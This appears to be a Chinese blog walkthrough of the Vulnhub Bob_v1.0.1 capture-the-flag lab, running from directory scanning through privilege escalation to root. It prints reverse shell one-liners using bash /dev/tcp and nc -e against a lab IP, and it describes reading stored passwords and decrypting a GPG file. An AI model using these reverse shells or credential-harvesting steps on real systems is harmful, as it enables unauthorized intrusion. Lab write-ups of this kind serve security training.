首页 > 其他分享 >【Sword系列】Vulnhub靶机Bob_v1.0.1 writeup

【Sword系列】Vulnhub靶机Bob_v1.0.1 writeup

时间:2023-09-29 17:00:43浏览次数:39  
标签:www writeup gpg 用户 v1.0 Vulnhub bob txt bash

个人博客地址:  http://www.sword-blogs.com/ 下载地址:https://www.vulnhub.com/entry/bob-101,226/ 在这里插入图片描述

信息搜集

扫描IP地址

在这里插入图片描述

扫描端口及端口信息

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-h1PmvMJi-1645192295721)(assets/image-20220104222359-a5l6wo1.png)] 访问80端口并没有发现有用的信息

扫描目录

在这里插入图片描述 看到有熟悉的robots.txt,访问看一下 在这里插入图片描述 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 在这里插入图片描述

getshell

bash反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1'
nc发送一个shell到本地
/bin/nc 192.168.1.140 4444 -e /bin/bash

查看用户,看到一共有六个用户拥有登录权限 在这里插入图片描述 在bob的家目录里的.old_passwordfile.html文件看到了jc用户和seb用户的密码 在这里插入图片描述 尝试使用这两个用户登录 在这里插入图片描述 这两个用户也没有啥特殊的权限 继续查看bob家目录的文件,从桌面开始找,刚找到Documents就发现了一些小惊喜,login.txt.gpg 在这里插入图片描述 既然有GPG密文的文件,肯定会有解密的密钥 查看一下,还有个文件夹Secret,进去继续摸索 一路向下,来到最后一个文件,查看到一个名字为notes.sh的文件 在这里插入图片描述 没发现啥有用的信息,执行一下notes.sh这个脚本 在这里插入图片描述 仔细观察执行出来的这个结果,发现每一行都有一个大写的字母 将每一行的大写字母都提取出来 HARPOCRATES 回到login.txt.gpg的地方输入密码解密

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

在这里插入图片描述

提权

找到了bob用户的密码,使用bob用户登录,直接sudo su提权到root 在这里插入图片描述 成功获取根目录下的flag 在这里插入图片描述 到这里成功完成了该靶机! 本文所有用到的工具都可以关注微信公众号“网络安全学习爱好者”联系公众客服免费领取!有关学习的问题也可以加客服一起学习! 在这里插入图片描述

个人博客地址:  http://www.sword-blogs.com/

标签:www,writeup,gpg,用户,v1.0,Vulnhub,bob,txt,bash
From: https://blog.51cto.com/u_15952481/7650913

相关文章

  • 2023年台州市网络安全大赛Writeup
    WebeasyLDContent-Type:image/png绕过上传.so文件可以看到前面的利用都是基于其相关命令加载了strncmp函数,通过构造对strncmp函数的劫持来实现的,如果有些命令不加载strncmp函数的话其就无法正常运行起来,这个时候有一种思路就是所有的命令进行全量劫持从而达到全局劫持的效果,相......
  • 攻防世界MISC【3-1】练习题WriteUp
    下载附件是一个没有后缀的文件,直接扔到010Editor看看观察了一下发现应该是rar压缩包,去给它加上后缀试试。加上后缀解压出来的又是一个不知道是什么的文件。直接丢到010Editor看了看发现是个流量包既然知道了是个流量包,试着给它加上pcap后缀试试看BinGo用Wireshark可以打......
  • vulnhub - lazySysAdmin - writeup
    信息收集可以看到目标开放了常见的22,80,139,445,3306这个6667的服务少见。root@kalitmp/lazySysAdmin»arp-scan-Ieth1-lInterface:eth1,type:EN10MB,MAC:00:0c:29:02:72:37,IPv4:192.168.56.102Startingarp-scan1.10.0with256hosts(https://github.com/r......
  • [Writeup]2022 NewstarCTF_Week5(Web部分)
    一只网络安全菜鸟--(˙<>˙)/--写博客主要是想记录一下自己的学习过程,过两年毕业了也能回头看看自己都学了些啥东西。由于本人水平有限内容难免有错误、疏漏、逻辑不清、让人看不懂等各种问题,恳请大家批评指正如果我写的东西能对你有一点点帮助,那真是再好不过了。2023Newsta......
  • MyCode代码生成器v1.0.0.2(BCB版)
    BCB开发管理系统之类的软件非常方便,而管理系统离不开数据库,对于我们开发人员而言,编写数据库操作代码比较繁琐,每次一个项目都得重新或大部分编写数据库操作代码,同时还得面对代码中可能存在的bug,有鉴于此,本人编写了MyCode-代码生成器,让我们一键生成对数据库操作的代码(cpp、h文件),直接......
  • Napping - vulnhub - writeup
    Napping-vulnhub-writeup信息收集目标开放了22和80。root@kali~»arp-scan-Ieth1-lInterface:eth1,type:EN10MB,MAC:00:0c:29:02:72:37,IPv4:192.168.56.102Startingarp-scan1.10.0with256hosts(https://github.com/royhills/arp-scan)192.168.56.10......
  • 【vulnhub】——DC-9靶机
    【vulnhub】——DC-9靶机1.主机发现扫描kali主机C段(Kali和DC-9主机在同一个网关下):发现主机为192.168.108.146,进行详细端口扫描:可以看到靶机开了一个ssh和http服务。可以使用ssh弱密码爆破,但是可以看到22端口的状态是filter,这里先看web部分。2.SQL注入打开相应网页可以......
  • 《VulnHub》DarkHole:1
    @目录1:靶场信息2:打靶2.1:情报收集&威胁建模2.2:漏洞分析&渗透攻击3:总结3.1:命令&工具3.1.1:Nmap3.2:关键技术VulnHub打靶记录。官网:https://www.vulnhub.com攻击机为Kali-Linux-2023.2-vmware-amd64。KaliNATIP:192.168.8.10。1:靶场信息靶场网址:https://www.vulnhub.com/e......
  • 提取.NET开发的DLL中的类为json文件工具软件ConsoleApp_Dll_Class2Json_V1.0开源了
    提取.NET开发的DLL中的类为json文件工具软件ConsoleApp_Dll_Class2Json_V1.0开源了同步在github和gitee上面发布。github https://github.com/binghe021/ConsoleApp_Dll_Class2Jsongitee https://gitee.com/binghe021/ConsoleApp_Dll_Class2Json......
  • [Writeup]2022 NewstarCTF_Week2(Web部分)
    一只网络安全菜鸟--(˙<>˙)/--写博客主要是想记录一下自己的学习过程,过两年毕业了也能回头看看自己都学了些啥东西。由于本人水平有限内容难免有错误、疏漏、逻辑不清、让人看不懂等各种问题,恳请大家批评指正如果我写的东西能对你有一点点帮助,那真是再好不过了......